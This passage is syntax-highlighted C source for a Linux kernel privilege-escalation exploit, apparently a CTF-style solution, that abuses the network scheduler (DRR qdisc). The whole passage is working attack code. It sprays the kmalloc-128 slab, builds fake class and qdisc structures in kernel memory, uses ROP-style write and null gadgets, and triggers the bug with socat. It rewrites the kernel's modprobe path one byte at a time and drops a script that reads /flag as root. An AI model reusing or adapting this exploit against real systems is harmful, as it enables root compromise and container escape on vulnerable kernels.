    <span class="kt">uint64_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">max</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
        <span class="n">create_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Update the bucket</span>
    <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">min</span> <span class="o">=</span> <span class="n">offset</span><span class="p">;</span>
    <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">=</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">spray_amt</span><span class="p">;</span> 
<span class="p">}</span>

<span class="c1">// Free all of the objects we allocated in steps 2 and 3. This will place these</span>
<span class="c1">// pages on the kmalloc-128 partials list</span>
<span class="kt">void</span> <span class="nf">cc_4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Calculate the id to start with and the amt to free</span>
    <span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">cc2_bucket</span><span class="p">.</span><span class="n">min</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">free_amt</span> <span class="o">=</span> <span class="n">cc3_bucket</span><span class="p">.</span><span class="n">max</span> <span class="o">-</span> <span class="n">start</span><span class="p">;</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">free_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%ld"</span><span class="p">,</span> <span class="n">i</span> <span class="o">+</span> <span class="n">start</span><span class="p">);</span>
        <span class="n">delete_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Free an object on each of the pages that we allocated in step 1. This will</span>
<span class="c1">// place all of these pages onto the partials list and evict our empty page</span>
<span class="kt">void</span> <span class="nf">cc_5</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Pick the first object to free</span>
    <span class="kt">uint64_t</span> <span class="n">start</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">min</span><span class="p">;</span>

    <span class="c1">// Establish the max free object</span>
    <span class="kt">uint64_t</span> <span class="n">max</span> <span class="o">=</span> <span class="n">cc1_bucket</span><span class="p">.</span><span class="n">max</span><span class="p">;</span>

    <span class="c1">// Free one object per page </span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">max</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="n">OBJS_PER_SLAB</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">char</span> <span class="n">table_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">table_name</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">table_name</span><span class="p">),</span> <span class="s">"table.%d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="n">delete_table</span><span class="p">(</span><span class="n">table_name</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">char</span> <span class="o">*</span><span class="n">required_files</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"tc.bin"</span><span class="p">,</span>
    <span class="s">"ip.bin"</span><span class="p">,</span>
    <span class="s">"socat.bin"</span><span class="p">,</span>
    <span class="s">"iptables.bin"</span>
<span class="p">};</span>

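<span class="kt">size_t</span> <span class="n">num_files</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">required_files</span><span class="p">)</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">required_files</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>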

<span class="kt">int</span> <span class="nf">get_kernel_version</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">utsname</span> <span class="n">buffer</span><span class="p">;</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="n">uname</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buffer</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"uname"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">major_version</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">sscanf</span><span class="p">(</span><span class="n">buffer</span><span class="p">.</span><span class="n">release</span><span class="p">,</span> <span class="s">"%d"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">major_version</span><span class="p">);</span>

    <span class="k">return</span> <span class="n">major_version</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Fake class data</span>
<span class="kt">uint8_t</span> <span class="n">g_class</span><span class="p">[</span><span class="mi">128</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Set up the fake class contents in the pipes</span>
<span class="kt">void</span> <span class="nf">setup_fake_class</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set each one up with cyclical pattern for debugging</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_class</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mh">0x4141414141414141</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">128</span> <span class="o">/</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ptr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">val</span><span class="p">;</span>
        <span class="n">val</span> <span class="o">+=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Fake &amp;cl-&gt;qdisc, set it to the address of the kernfs buffer + 8 to avoid</span>
    <span class="c1">// a NULL later when we use the address of &amp;qdisc-&gt;gso_skb</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span>

    <span class="c1">// Fake the &amp;cl-&gt;deficit value, set it such that it is always greater than</span>
    <span class="c1">// the "len" returned from qdisc_pkt_len inside of drr_dequeue</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFFFFFFFFFFFFFF</span><span class="p">;</span>

    <span class="c1">// Fake class data is set up. 32 of them fit on a page, so each pipe gets</span>
    <span class="c1">// 32 fake classes in its backing page. Reset all the pipe buffer contents</span>
    <span class="c1">// to be the fake class</span>
    <span class="kt">char</span> <span class="n">drain</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Drain the current pipe</span>
        <span class="n">read</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_READ</span><span class="p">],</span> <span class="n">drain</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

        <span class="c1">// Write the class contents to the pipe 32 times</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="kt">ssize_t</span> <span class="n">bytes_written</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="k">while</span> <span class="p">(</span><span class="n">bytes_written</span> <span class="o">&lt;</span> <span class="mi">128</span><span class="p">)</span> <span class="p">{</span>
                <span class="kt">ssize_t</span> <span class="n">ret</span> <span class="o">=</span> 
                    <span class="n">write</span><span class="p">(</span>
                        <span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_WRITE</span><span class="p">],</span>
                        <span class="n">g_class</span> <span class="o">+</span> <span class="n">bytes_written</span><span class="p">,</span>
                        <span class="mi">128</span> <span class="o">-</span> <span class="n">bytes_written</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">perror</span><span class="p">(</span><span class="s">"write failed"</span><span class="p">);</span>
                    <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="n">bytes_written</span> <span class="o">+=</span> <span class="n">ret</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>


<span class="c1">// Fake qdisc data</span>
<span class="kt">uint8_t</span> <span class="n">g_qdisc</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

<span class="c1">// Place controlled data at a kernel address we can deduce from the kernel base</span>
<span class="kt">void</span> <span class="nf">fill_kernfs_buf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create a lockfile that we can actually use</span>
    <span class="n">setenv</span><span class="p">(</span><span class="s">"XTABLES_LOCKFILE"</span><span class="p">,</span> <span class="s">"/tmp/xtables.lock"</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>

    <span class="c1">// Redirect stdout and stderr to /dev/null</span>
    <span class="kt">int</span> <span class="n">devnull</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"/dev/null"</span><span class="p">,</span> <span class="n">O_WRONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">devnull</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">dup2</span><span class="p">(</span><span class="n">devnull</span><span class="p">,</span> <span class="n">STDOUT_FILENO</span><span class="p">);</span>
    <span class="n">dup2</span><span class="p">(</span><span class="n">devnull</span><span class="p">,</span> <span class="n">STDERR_FILENO</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">devnull</span><span class="p">);</span>

    <span class="c1">// Execute iptables to fill buffer</span>
    <span class="n">execl</span><span class="p">(</span><span class="s">"./iptables.bin"</span><span class="p">,</span> <span class="s">"iptables"</span><span class="p">,</span> <span class="s">"-A"</span><span class="p">,</span> <span class="s">"OUTPUT"</span><span class="p">,</span> <span class="s">"-m"</span><span class="p">,</span> <span class="s">"cgroup"</span><span class="p">,</span> <span class="s">"--path"</span><span class="p">,</span>
        <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">g_qdisc</span><span class="p">,</span> <span class="s">"-j"</span><span class="p">,</span> <span class="s">"LOG"</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="nb">NULL</span><span class="p">);</span>

    <span class="c1">// execl only returns on failure, bail so the child never falls through</span>
    <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Check for NULL byte in u64</span>
<span class="kt">int</span> <span class="nf">has_null</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">val</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(((</span><span class="n">val</span> <span class="o">&gt;&gt;</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">))</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">setup_fake_qdisc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">num_complete</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Set each one up with cyclical pattern for debugging</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_qdisc</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="kt">uint64_t</span> <span class="n">val</span> <span class="o">=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">4096</span> <span class="o">/</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ptr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">val</span><span class="p">;</span>
        <span class="n">val</span> <span class="o">+=</span> <span class="mh">0x0101010101010101</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Fake &amp;qdisc-&gt;ops, set it kind of far into the kernfs_buf to avoid conflict</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">32</span><span class="p">;</span>

    <span class="c1">// Fake &amp;qdisc-&gt;ops-&gt;peek</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_write_gadget_addr</span><span class="p">;</span>

    <span class="c1">// The write address for the write gadget</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_write_target</span> <span class="o">+</span> <span class="n">num_complete</span><span class="p">;</span>

    <span class="c1">// Inside qdisc_dequeue_peeked, we do skb_peek(&amp;sch-&gt;gso_skb) and that</span>
    <span class="c1">// address has to point to itself, so make &amp;sch-&gt;gso_skb equal itself</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mh">0x88</span><span class="p">;</span>

    <span class="c1">// Place pointer to our return NULL gadget so that qdisc_dequeue_peeked</span>
    <span class="c1">// returns NULL</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_null_gadget_addr</span><span class="p">;</span>

    <span class="c1">// NULL gadget does `return dst-&gt;dev-&gt;mtu` and dev happens to be the first</span>
    <span class="c1">// field, so set ours to a pointer that points to NULL (NULL happens later</span>
    <span class="c1">// in the kernfs_buf)</span>
    <span class="n">ptr</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">512</span><span class="p">;</span>

    <span class="c1">// These addresses cannot contain a NULL byte or else our kernfs_buf gets</span>
    <span class="c1">// NULL terminated and we're out of luck</span>
    <span class="k">if</span> <span class="p">(</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">120</span><span class="p">)</span> <span class="o">||</span> 
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_write_gadget_addr</span><span class="p">)</span> <span class="o">||</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_write_target</span><span class="p">)</span>      <span class="o">||</span>
        <span class="n">has_null</span><span class="p">(</span><span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mh">0x88</span><span class="p">)</span>
        <span class="p">)</span> <span class="p">{</span>
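        <span class="n">printf</span><span class="p">(</span><span class="s">"NULL byte in one of these values: 0x%lx, 0x%lx, 0x%lx, 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mi">120</span><span class="p">,</span> <span class="n">g_write_gadget_addr</span><span class="p">,</span>
            <span class="n">g_write_target</span><span class="p">,</span> <span class="n">g_kernfs_addr</span> <span class="o">+</span> <span class="mh">0x88</span><span class="p">);</span>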
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Send kernfs data to the kernel</span>
<span class="kt">void</span> <span class="nf">send_kernfs_data</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"fork"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Child</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fill_kernfs_buf</span><span class="p">();</span> <span class="c1">// Doesn't return</span>
    <span class="p">}</span>

    <span class="c1">// Parent, wait for child to finish</span>
    <span class="kt">int</span> <span class="n">status</span><span class="p">;</span>
    <span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">status</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Trigger the bug</span>
<span class="kt">void</span> <span class="nf">trigger_bug</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo </span><span class="se">\"\"</span><span class="s"> | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Trigger bug and increment kernel value for /sbin/modprobe overwrite</span>
<span class="kt">void</span> <span class="nf">increment_kernel_val</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">num_complete</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Reset the fake class data, because deficit changes each iteration</span>
    <span class="n">setup_fake_class</span><span class="p">();</span>

    <span class="c1">// Reset the fake qdisc data, we NULL out the field in the increment gadget</span>
    <span class="n">setup_fake_qdisc</span><span class="p">(</span><span class="n">num_complete</span><span class="p">);</span>

    <span class="c1">// Send the data to the kernel</span>
    <span class="n">send_kernfs_data</span><span class="p">();</span>

    <span class="c1">// Trigger the bug</span>
    <span class="n">trigger_bug</span><span class="p">();</span>
<span class="p">}</span>

<span class="c1">// Overwrite modprobe path</span>
<span class="kt">void</span> <span class="nf">overwrite_modprobe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// We have an increment gadget as our write primitive. This means we'll </span>
    <span class="c1">// target one byte of /sbin/modprobe at a time and increment that byte</span>
    <span class="c1">// until it's the right value. We start here: /'s'bin/modprobe. The way</span>
    <span class="c1">// that I decided to do this was to simply encode the logic in this function</span>
    <span class="c1">// by simulating each write as we do it in the kernel and then we can</span>
    <span class="c1">// check in the program if we're done or not. So let's set up our simulated</span>
    <span class="c1">// values:</span>
    <span class="c1">// </span>
    <span class="c1">// What we're starting with</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="n">sim_start</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/sbin/modprobe"</span><span class="p">;</span>

    <span class="c1">// What our goal is</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="n">sim_goal</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/proc/500/fd/3"</span><span class="p">;</span>

    <span class="c1">// Buffer to simulate writes</span>
    <span class="kt">uint8_t</span> <span class="n">sim_modprobe</span><span class="p">[</span><span class="mi">128</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">sim_modprobe</span><span class="p">,</span> <span class="n">sim_start</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sim_start</span><span class="p">));</span>

    <span class="c1">// What we're targeting right now. We start at offset 1 because '/' already</span>
    <span class="c1">// works for us</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">sim_write_target</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">sim_modprobe</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Iterate until the memory is identical</span>
    <span class="kt">size_t</span> <span class="n">num_complete</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int64_t</span> <span class="o">*</span><span class="n">write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">sim_write_target</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">sim_goal</span><span class="p">,</span> <span class="n">sim_modprobe</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sim_goal</span><span class="p">)))</span> <span class="p">{</span>
        <span class="c1">// Iterate until the character matches</span>
        <span class="k">while</span> <span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">sim_write_target</span><span class="p">,</span> <span class="n">sim_goal</span> <span class="o">+</span> <span class="n">num_complete</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="p">{</span>
            <span class="c1">// Increment the val and set it</span>
            <span class="kt">int64_t</span> <span class="n">curr_val</span> <span class="o">=</span> <span class="o">*</span><span class="n">write_ptr</span><span class="p">;</span>
            <span class="n">curr_val</span><span class="o">++</span><span class="p">;</span>
            <span class="o">*</span><span class="n">write_ptr</span> <span class="o">=</span> <span class="n">curr_val</span><span class="p">;</span>

            <span class="c1">// Increment the value in the kernel</span>
            <span class="n">increment_kernel_val</span><span class="p">(</span><span class="n">num_complete</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// This character matches, move to the next character</span>
        <span class="n">sim_write_target</span><span class="o">++</span><span class="p">;</span>
        <span class="n">write_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int64_t</span> <span class="o">*</span><span class="p">)</span><span class="n">sim_write_target</span><span class="p">;</span>
        <span class="n">num_complete</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define BUFFER_SIZE 1024
</span>
<span class="c1">// What children do</span>
<span class="kt">void</span> <span class="nf">child_func</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Open the privesc script</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">"privesc.sh"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Got the wrong fd for privesc.sh</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="n">BUFFER_SIZE</span><span class="p">];</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span><span class="p">;</span>

    <span class="c1">// Block until there's data to read from stdin</span>
    <span class="k">while</span> <span class="p">((</span><span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">)))</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="n">STDOUT_FILENO</span><span class="p">,</span> <span class="n">buffer</span><span class="p">,</span> <span class="n">bytes_read</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Handle possible read errors</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"read"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Exit</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// How many child processes we spawn</span>
<span class="cp">#define NUM_CHILDS 500UL
</span>
<span class="c1">// Spray children processes so we have a predictable pid in the container</span>
<span class="kt">void</span> <span class="nf">spray_children</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_CHILDS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"fork"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Child</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">child_func</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Drop scripts to disk</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Dropping scripts...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"printf '</span><span class="se">\xff\xff\xff\xff</span><span class="s">' &gt; trigger.sh"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo '#!/bin/bash' &gt; privesc.sh"</span><span class="p">);</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"echo 'cat /flag &gt; /proc/500/fd/0' &gt;&gt; privesc.sh"</span><span class="p">);</span>
